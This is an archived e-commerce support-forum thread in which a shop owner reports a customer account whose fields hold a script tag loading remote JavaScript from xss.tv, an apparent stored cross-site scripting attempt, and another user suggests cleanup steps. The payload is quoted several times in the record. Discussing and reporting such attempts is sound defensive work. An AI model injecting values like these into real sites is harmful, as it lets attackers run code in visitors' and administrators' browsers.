greasemonkey Posted February 10, 2016 Share Posted February 10, 2016 Using 2.3.4 BS And I've had a customer just create an account with the following details.... looks like someone is trying to inject something? 23311;"18636";NULL;"""__script src=//xss.tv/lkvzyF__/script_";"Linda";"Juan""__script src=//xss.tv/lkvzyF__/script_";"24 Cyprus""__script src=//xss.tv/lkvzyF__/script_";;"T1P 1N1";"Hiram""__script src=http://xss.tv/lkvzyF__/script_";;"38";"66" Link to comment Share on other sites More sharing options...
MrPhil Posted February 10, 2016 Share Posted February 10, 2016 It certainly looks like they're trying to do something nasty. Even if this isn't successful against an osC installation, I would still (at a minimum) manually edit their account information to remove the suspicious stuff. If it comes back, delete their account and IP ban them. Link to comment Share on other sites More sharing options...
greasemonkey Posted February 10, 2016 Author Share Posted February 10, 2016 @@MrPhil thank for the advice - I've done that. And crossed my fingers.... I presumed this type of attack would not be successful .... But when it's such a blatant attempt I get kinda scared. Maybe the custom has a virus that is trying to do the injection? Or maybe from a public wifi? The customer seems legit. Link to comment Share on other sites More sharing options...
MrPhil Posted February 10, 2016 Share Posted February 10, 2016 If you think it might be accidental because their PC has been zombified, perhaps they'd appreciate a "heads up" notice that their PC may be sick. On the other hand, if they're deliberately trying to "get" you, they now know that you watch for such things and are on alert (and thus not a good target for further attempts). Link to comment Share on other sites More sharing options...
Recommended Posts
Archived
This topic is now archived and is closed to further replies.